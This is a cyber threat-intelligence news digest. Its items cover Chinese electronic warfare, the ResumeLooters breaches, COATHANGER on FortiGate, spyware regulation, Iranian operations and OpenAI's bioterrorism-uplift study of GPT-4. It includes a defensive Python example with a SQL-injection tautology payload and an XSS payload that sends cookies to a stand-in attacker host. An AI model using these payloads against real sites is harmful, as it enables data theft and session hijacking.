Daily Drop (715): CN: EW, ResumeLooter, CN: Starlink, OpenAI: Bioterrorism, COATHANGER malware, Pall Mall Process, SpaceDrone, Spyware Thrives Minus Bans, Iran Enhances CNO Capabilities
02-07-24
Wednesday, Feb 07 2024 // (IG): BB // ShadowNews // Coffee for Bob // Proxies
*Started adding Proof of Concepts (PoCs), where available, for the CVEs mentioned:
For a CVE, a Proof of Concept (PoC) is a minimal demonstration that the vulnerability can actually be triggered on an affected version, typically a script or request sequence that produces a crash, an unexpected response, or code execution. It verifies exploitability rather than delivering a finished exploit, and the same code is what a defender uses to confirm that a patch or mitigation works. Run a PoC only against systems you are authorised to test. *
China's Alleged Breakthrough in Electronic Warfare: A Game Changer in Military Tech
Bottom Line Up Front (BLUF): Via state-sponsored media (SCMP), Chinese researchers have reportedly achieved a significant breakthrough in electronic warfare (EW), claiming the ability to monitor and analyze the complete electromagnetic spectrum in real time. This advancement is said to potentially disrupt the operations of satellites like Elon Musk's Starlink, signifying a substantial benefit for their "GW" mega-constellation efforts. The report may be laced with propaganda.
Analyst Comments: This development, if accurate, represents a pivotal shift in global military technology dynamics. The ability to monitor and disrupt communication satellites could alter the strategic balance, particularly in regions like the South China Sea. However, the veracity of these claims is crucial, as similar assertions in the past have sometimes outpaced actual capabilities. The focus on Starlink satellites specifically indicates China's concern over their potential use in military communications and reconnaissance. This scenario underscores the increasing importance of space and cyber domains in modern warfare, where advanced nations are actively seeking to gain the upper hand.
FROM THE MEDIA: Chinese scientists claim to have made a significant breakthrough in electronic warfare technology, potentially allowing for the real-time monitoring and disruption of communication satellites, including Elon Musk's Starlink. According to a South China Morning Post report, the technology enables the Chinese military to swiftly identify and suppress enemy signals while maintaining its own communication networks. The system is reportedly fielded aboard the Type 055 destroyer. The new technology is said to extend into the gigahertz range, covering frequencies used by various communication platforms, and the development of new signal-processing chips has been key to this enhanced capability. The implications of this breakthrough could be profound, especially for the security and effectiveness of satellite-based communication systems like Starlink, which have become integral to modern warfare and global communications. China's focus on such technologies highlights the strategic importance of dominating the electromagnetic spectrum in future conflicts.
READ THE STORY: IE // NBF // The EurAsian Times // WION // ET
Hackers Exploit Job Boards to Steal Millions of Resumes and Personal Data
Bottom Line Up Front (BLUF): The cybercriminal group known as ResumeLooters has been actively targeting employment agencies and retail companies in the Asia-Pacific region since early 2023. They have compromised 65 job search platforms and stolen over 2 million records, including resumes and personal data, using SQL injection and XSS attacks. The stolen data is sold on Telegram channels. This campaign highlights the persistent vulnerability of websites to SQL injection and XSS exploits.
Analyst Comments: ResumeLooters' activities underscore a continuing trend in cybercrime where threat actors exploit widely known vulnerabilities like SQL injection and XSS. Despite being long-identified security weaknesses, many websites remain inadequately protected, allowing cybercriminals to siphon vast amounts of sensitive data easily. The targeting of job search platforms is particularly concerning due to the personal nature of the data involved. This situation is a stark reminder for companies to prioritize robust cybersecurity practices and for individuals to be cautious about the information they share online. The geopolitical aspect, mainly focusing on the APAC region, indicates a strategic selection of targets, possibly due to perceived vulnerabilities in the cybersecurity infrastructure of these countries.
FROM THE MEDIA: The ResumeLooters group has been active since early 2023, focusing on job search platforms in the Asia-Pacific region. Group-IB, a cybersecurity firm, reported that the group compromised 65 websites between November and December 2023. The attackers used SQL injection to access databases containing personal data such as names, phone numbers, emails, dates of birth, and detailed employment histories. Over two million unique email addresses were found in the stolen dataset.
READ THE STORY: HackREAD // THN // Group-IB
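The two bug classes the story above names, shown as an added example that is not code from Group-IB's report or from any ResumeLooters tooling: a toy job-board candidate lookup written the injectable way and the parameterized way against an in-memory SQLite table, plus the stored-XSS equivalent with and without output escaping. The table, rows, payloads and function names are all constructed for illustration.

```python
import html
import sqlite3

# Constructed sample data standing in for a job board's candidate table (not real records).
SAMPLE_ROWS = [
    ("alice@example.com", "Alice Example", "Data Analyst"),
    ("bob@example.com", "Bob Example", "Site Reliability Engineer"),
    ("carol@example.com", "Carol Example", "Data Engineer"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE candidates (email TEXT, name TEXT, title TEXT)")
    conn.executemany("INSERT INTO candidates VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, title_query: str) -> list:
    """Injectable: the user-supplied string is spliced into the SQL text.

    Anything that closes the quote rewrites the WHERE clause, so one request
    can return the whole table instead of the rows for a single job title.
    """
    sql = "SELECT email, name FROM candidates WHERE title = '" + title_query + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, title_query: str) -> list:
    """Hardened: the driver binds the value, so the query text is fixed and
    the payload is compared as a literal string (which matches nothing)."""
    sql = "SELECT email, name FROM candidates WHERE title = ?"
    return conn.execute(sql, (title_query,)).fetchall()


# Classic tautology payload: the WHERE clause becomes  title = '' OR '1'='1'
INJECTION_PAYLOAD = "' OR '1'='1"


def render_name_vulnerable(name: str) -> str:
    """Reflects a stored value into HTML untouched, so script planted in the
    data runs in every visitor's browser (stored XSS)."""
    return "<li>" + name + "</li>"


def render_name_escaped(name: str) -> str:
    """Escapes the value so the browser displays the characters instead of
    interpreting them as markup."""
    return "<li>" + html.escape(name, quote=True) + "</li>"


# Constructed payload of the kind a stored-XSS attack plants in a profile field.
XSS_PAYLOAD = '<script>location="https://attacker.invalid/?c="+document.cookie</script>'


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal query :", search_vulnerable(db, "Data Analyst"))
    print("vulnerable, injected     :", search_vulnerable(db, INJECTION_PAYLOAD))
    print("parameterized, injected  :", search_parameterized(db, INJECTION_PAYLOAD))
    print("unescaped HTML           :", render_name_vulnerable(XSS_PAYLOAD))
    print("escaped HTML             :", render_name_escaped(XSS_PAYLOAD))
```

Run as a script, the tautology payload dumps every row through the string-built query and returns nothing through the bound query; the escaped renderer turns the script tag into inert text. The fix in both cases is the same discipline the analyst comments ask for: never splice untrusted input into SQL text, and escape on output for the context the data lands in.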
China Perceives Starlink as a Threat to National Security and Bolsters Satellite Development
Bottom Line Up Front (BLUF): China has expressed serious national security concerns regarding SpaceX's Starlink satellites and their potential military applications under the Starshield program. The People's Liberation Army views the deployment of these satellites as a significant threat, capable of establishing a US advantage in space warfare.
Analyst Comments: China's reaction to SpaceX's Starlink program, particularly the new direct-to-cellular satellites, underscores Beijing's strategic anxiety about maintaining parity in space technology. The Chinese military's warnings about Starlink's potential military use, including "suicide missions" against other space assets, indicate a heightened perception of threat from US advancements in space. The focus on Starlink's ability to enhance communication capabilities, especially in remote areas, reflects the strategic value of maintaining communication superiority in modern warfare. China's concerns are amplified by Starlink's proven effectiveness in Ukraine, demonstrating the system's resilience and operational advantages. In response, China is advancing its own satellite capabilities, evidenced by the G60 Starlink project in Shanghai and the significant funding raised by Shanghai Yuanxin Satellite Technology Co., Ltd. This aggressive push in satellite technology is part of a broader strategy to counter US influence in space and secure its own interests, particularly regarding Taiwan.
FROM THE MEDIA: China has raised alarms over the military implications of SpaceX's Starlink satellites, especially within the context of the Starshield program. The concern stems from the perceived threat to national security, with fears that the deployment could afford the US an advantage in space warfare. Shanghai Yuanxin Satellite Technology Co., Ltd. has completed a substantial series A financing round of RMB 6.7 billion, with leading investment from the China Development Bank Manufacturing Transformation and Upgrading Fund. Continual strategic support is provided by founding shareholder Shanghai Lianhe Investment, with participation from various prominent investors including Guoke Capital, Guosheng Capital, SAIC Hengxu Capital, CCTV Media Fund, Guotai Junan, Zhongkechuangxing, and AsiaInfo Security.
READ THE STORY: Gamachar Central // Newsweek // China Money Network // WSJ
OpenAI's Experiment on AI’s bioterrorism potential should not be overlooked
Bottom Line Up Front (BLUF): A recent OpenAI study involving GPT-4 has sparked concerns over the potential misuse of AI in bioterrorism. Participants, including students and experts, were tasked with planning a biological terror attack using either the internet alone or the internet together with GPT-4. Findings suggest that GPT-4 provided at most a "mild uplift" in planning such attacks, with the largest gains going to experts in certain stages; the effect was not statistically significant, but it was enough to raise concern over the model's potential misuse.
Analyst Comments: The OpenAI experiment marks a critical juncture in our understanding of AI's potential misuse, particularly in sensitive areas like bioterrorism. The experiment's design, involving a diverse group of participants and varying levels of access to GPT-4, provides a unique insight into the model's capabilities and limitations in aiding bioterrorism planning. The nuanced findings, indicating a slight but notable advantage for those using GPT-4, suggest that AI can incrementally enhance certain aspects of threat planning, especially for those with prior expertise. Historically, the dual-use nature of technology has always presented a balancing act between innovation and potential misuse. In the realm of AI, this balance becomes even more critical due to the technology's pervasive and rapidly evolving nature. The experiment’s outcome echoes previous technological advances where their benefits were accompanied by new risks.
FROM THE MEDIA: OpenAI's recent experiment, as covered by Anjana Ahuja, explores the intersection of AI and bioterrorism. Involving 100 participants with varying levels of expertise in biology, the study aimed to assess whether GPT-4 could aid in planning a biological terror attack. The participants, split into groups using either the internet or GPT-4, were tasked with planning an attack involving tasks like sourcing a biological agent and planning its release. The findings revealed that experts equipped with GPT-4 outperformed their counterparts who only used the internet, particularly in areas like procurement and scaling up of a bioweapon. However, the overall effect was considered mild and statistically insignificant. This nuanced result led to debates within the scientific and security communities about the actual level of threat posed by AI in this context. OpenAI's study aligns with broader research efforts, such as those by the Rand Corporation, which also found no significant enhancement of bioterror attack plans through AI compared to traditional internet use.
READ THE STORY: FT // The Washington Post // RAND // Anthropic
Chinese Hackers Breach Dutch Military Network Via FortiGate Flaw
Bottom Line Up Front (BLUF): Chinese state-backed hackers infiltrated a Dutch military network used for unclassified research and development by exploiting a critical security flaw in Fortinet FortiGate devices. The cyberattack, occurring in 2023, deployed the COATHANGER malware, allowing persistent remote access and evading detection mechanisms. This incident marks the first public attribution of a cyber espionage campaign to China by the Netherlands, amidst rising global concerns over Chinese cyber activities.
Analyst Comments: The breach of the Dutch military network signifies an escalation in cyber espionage, highlighting the growing sophistication of state-sponsored cyberattacks. The choice of target, a military R&D network, although unclassified, speaks to the strategic interest in military technologies and innovations. The deployment of COATHANGER, a highly stealthy malware, underscores the advanced capabilities of these threat actors. Because the implant survives reboots and firmware upgrades, applying the FortiOS patch closes the entry point but does not evict an implant already on the device; any FortiGate that was internet-exposed while unpatched should be examined for compromise, not just updated. This incident fits into a broader pattern of Chinese cyber espionage targeting global governmental and technological infrastructures. The timing of this revelation is crucial, as it coincides with increased international scrutiny of Chinese cyber activities and rising geopolitical tensions.
FROM THE MEDIA: The intrusion utilized a known vulnerability in FortiOS SSL-VPN, identified as CVE-2022-42475. The COATHANGER malware, distinct from another backdoor BOLDMOVE linked to China, is designed to be stealthy, persistent, and capable of surviving system reboots and firmware upgrades. This breach is part of a larger pattern of Chinese cyber espionage activities, as evidenced by past incidents and recent statements from Dutch authorities. Concurrently, the U.S. has taken action against Chinese threat actors in separate incidents, highlighting a coordinated international response to these threats. The Dutch Military Intelligence and Security Service (MIVD) and the Dutch National Cyber Security Centre (NCSC) have emphasized the need for heightened vigilance and improved cybersecurity measures in response to these sophisticated attacks.
READ THE STORY: The Register // Reuters // THN // PoC: CVE-2022-42475
The Pall Mall Process: Global Initiative on Commercial Spyware Regulation Faces Challenges
Bottom Line Up Front (BLUF): Israeli officials did not attend a key conference in London aimed at addressing the misuse of spyware, despite the country's significant role in the spyware export market. The conference, co-hosted by the UK and France, sought to launch the Pall Mall Process, an initiative for joint-action against the proliferation of commercial cyber intrusion tools. Notably, some countries implicated in spyware abuses did not sign the conference's pledge, highlighting the complexity of international consensus on this issue.
Analyst Comments: Israel's absence from the London conference is significant given its prominent position in the global spyware market and previous U.S. sanctions against Israeli companies for spyware misuse. The conference represents a critical step in international efforts to regulate the use of commercial spyware, which has been linked to human rights abuses globally. The varied participation and commitment levels among attending nations reflect the diplomatic and practical challenges in achieving a unified stance against spyware misuse. The Pall Mall Process appears to be a pivotal yet initial step towards more robust international cooperation and regulation in the cyber surveillance arena.
FROM THE MEDIA: The London conference, part of the Pall Mall Process, aims to increase transparency and accountability in the use of cyber intrusion tools. Over 35 states and international organizations, along with technology companies and civil society groups, attended, but key spyware market players like Israel were absent. The U.S. recently took concrete action against commercial spyware misuse, and the UK and France are spearheading this international effort. While 24 of the 35 attendees signed the pledge for greater action, notable countries with spyware abuse links, including Hungary, Mexico, Spain, and Thailand, refrained. The commitment includes engaging in dialogue and meeting again in France next year. This initiative underscores the growing global concern over spyware's role in human rights violations and national security threats.
READ THE STORY: The Record // GOV.UK
Spyware Industry Thrives Despite Global Crackdown Efforts
Bottom Line Up Front (BLUF): Despite governmental and technological efforts to regulate the spyware industry, the commercial spyware economy is experiencing substantial growth. Major players like NSO Group and Intellexa, alongside numerous smaller vendors, continue to develop and distribute surveillance tools. These tools are increasingly used for questionable purposes, including the targeting of human rights advocates, journalists, and political dissidents. Recent measures by the U.S. and an agreement led by the UK and France show concerted efforts to address this issue, yet the industry remains lucrative and largely unregulated.
Analyst Comments: The expansion of the spyware market, despite governmental actions and international agreements, highlights the challenges in curbing the misuse of such technologies. The commercial spyware industry, valued at $12 billion per year, continues to evolve, with a notable trend being the separation between spyware vendors and exploit developers. This industry's growth is concerning as it often results in human rights violations and undermines the trust and safety of the internet. The lack of shared data and transparency in this field hampers effective countermeasures, underscoring the need for a more coordinated and comprehensive approach to tackle this global cybersecurity threat.
FROM THE MEDIA: Google's Threat Analysis Group reports the discovery of 25 zero-days in 2023, with 20 exploited by spyware vendors. U.S. measures include visa restrictions on individuals involved in spyware misuse and adding certain companies to its Entity List. A recent international agreement led by the UK and France, participated in by 35 nations, aims to tackle the proliferation of spyware, but challenges remain in terms of implementation and enforcement. The spyware economy is not only a security concern but also a human rights issue, with numerous reports of spyware being used to detain and harm dissidents and journalists. The industry's resilience and adaptability call for more effective and collaborative global strategies to regulate and monitor the use of commercial spyware.
READ THE STORY: The Register // TAG
Sierra Vista to Host BlackStar Orbital's SpaceDrone Manufacturing Facility in 2026
Bottom Line Up Front (BLUF): BlackStar Orbital Technologies Corporation plans to establish a new manufacturing facility for its innovative SpaceDrone satellites at the Sierra Vista Municipal Airport by mid-2026. This development aligns with the company's focus on building reusable micro shuttle space drones, offering a sustainable alternative to single-use satellites. The project, representing a $7.1 million investment, is expected to generate significant economic impact and create 50 new jobs in the area.
Analyst Comments: The decision by BlackStar Orbital to set up their SpaceDrone manufacturing facility in Sierra Vista, Arizona, is a strategic move that leverages the region's existing aerospace expertise and infrastructure. This initiative marks a significant advancement in satellite technology, emphasizing sustainability in space operations. The SpaceDrone, resembling a miniature space shuttle, represents a shift away from the traditional single-use satellite model, potentially revolutionizing the space industry. The economic implications for Sierra Vista are substantial, with the potential to attract further aerospace and technology investments to the region. The project also highlights the growing trend of private companies leading innovations in space technology, further expanding the commercial space industry.
FROM THE MEDIA: The SpaceDrone, developed by BlackStar Orbital, is a reusable satellite about 2 meters long and 1.5 meters wide, capable of operating and landing like a space plane. The Sierra Vista facility will focus on building and testing the first generation of these SpaceDrones. The location was chosen due to its proximity to Fort Huachuca and the availability of relevant human capital. The city of Sierra Vista plans to apply for a Spaceport License from the Federal Aviation Administration, a critical step in advancing the project. The facility is expected to bring over $100 million in economic impact and create 50 new jobs, spanning various technical and operational roles. The development of this facility and the SpaceDrone technology aligns with the broader trend of increased private sector involvement and innovation in space exploration and sustainability.
READ THE STORY: AZPM
Iran Enhances Cyber Operations, Potentially Targeting US Infrastructure and 2024 Elections
Bottom Line Up Front (BLUF): Microsoft researchers have observed a significant refinement and increased coordination in Iranian cyber operations, raising concerns about potential threats to U.S. critical infrastructure and the upcoming 2024 elections. Iranian-linked groups have expanded their targets to include allies of Israel and are employing more sophisticated tactics, including the use of artificial intelligence in influence operations.
Analyst Comments: The evolution of Iranian cyber capabilities signifies a growing sophistication in state-sponsored cyber activities. The shift from opportunistic attacks to more focused and coordinated operations illustrates an increasing threat level, particularly with the involvement of various Iranian government entities and contractors. The diversification of targets and techniques, including AI-driven influence campaigns, indicates a strategic approach to cyber operations. This development is a critical concern for U.S. cybersecurity, given the potential implications for critical infrastructure security and the integrity of the electoral process. The situation underscores the need for robust cyber defenses and international cooperation to counter these emerging threats effectively.
FROM THE MEDIA: Following the outbreak of the conflict between Israel and Hamas, Iranian cyber operations have passed through three distinct phases, with an initial reactive phase giving way to more destructive and coordinated attacks. This escalation includes increased targeting of nations perceived as Israeli allies, with recent attacks on infrastructure in the United States. The U.S. government has attributed some of these attacks to the Islamic Revolutionary Guard Corps Cyber-Electronic Command and has sanctioned Iranian officials. The use of AI in influence operations, such as interrupting streaming television services with an AI-generated news anchor, represents a new tactic in the Iranian cyber arsenal. Microsoft's analysis suggests a more complex threat environment ahead of the 2024 U.S. elections, with an increase in collaborative efforts among various Iranian and Iran-affiliated groups.
READ THE STORY: Cyberscoop // Insikt
Items of interest
"Meme-lord" Litquidity: From Wall Street Satire to Entrepreneurial Success
Bottom Line Up Front (BLUF): Hank Medina, known by his pen name Litquidity, has revealed his true identity, transitioning from a satirical online persona to a successful entrepreneur. With a following of 800,000 on Instagram, Litquidity gained popularity for his humorous memes poking fun at Wall Street culture. Despite being the opposite of the loud and brash stereotype, Medina's alter ego became a cult-like figure in the finance industry.
Analyst Comments: Medina's journey from a junior investment banker to the mastermind behind Litquidity demonstrates the power of social media in shaping entrepreneurial ventures. Despite his unassuming nature, Litquidity's satire resonated with young finance professionals, leading to a significant online following. Medina's ability to leverage his online persona into a profitable brand showcases his business acumen and adaptability in the digital age.
FROM THE MEDIA: Hank Medina, also known as Litquidity, has stepped out from behind his satirical online persona to reveal his true identity. Medina's journey from a quiet observer in the finance industry to a social media sensation with 800,000 followers on Instagram highlights the transformative power of online humor. Despite initial anonymity, Litquidity's popularity grew, leading to a profitable portfolio of businesses and investments. Medina's success serves as a testament to the evolving landscape of entrepreneurship and the influence of digital media in shaping modern brands.
READ THE STORY: FT
Why Do Memes Matter? (Video)
FROM THE MEDIA: Memes are the language of the internet. At some point in the last decade, they became the secret ingredient for advertising, political messaging, and disinformation all across the world. Glad You Asked host Christophe Haubursin wanted to know why that happened — and what it means for the internet today.
The World War II meme that circled the world (Video)
FROM THE MEDIA: We know about the epic drama of World War II, but what about the jokes? The video tells the story (as best we can). The iconic piece of graffiti known in America as "Kilroy Was Here" traveled the world in a fashion remarkably similar to a modern meme.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.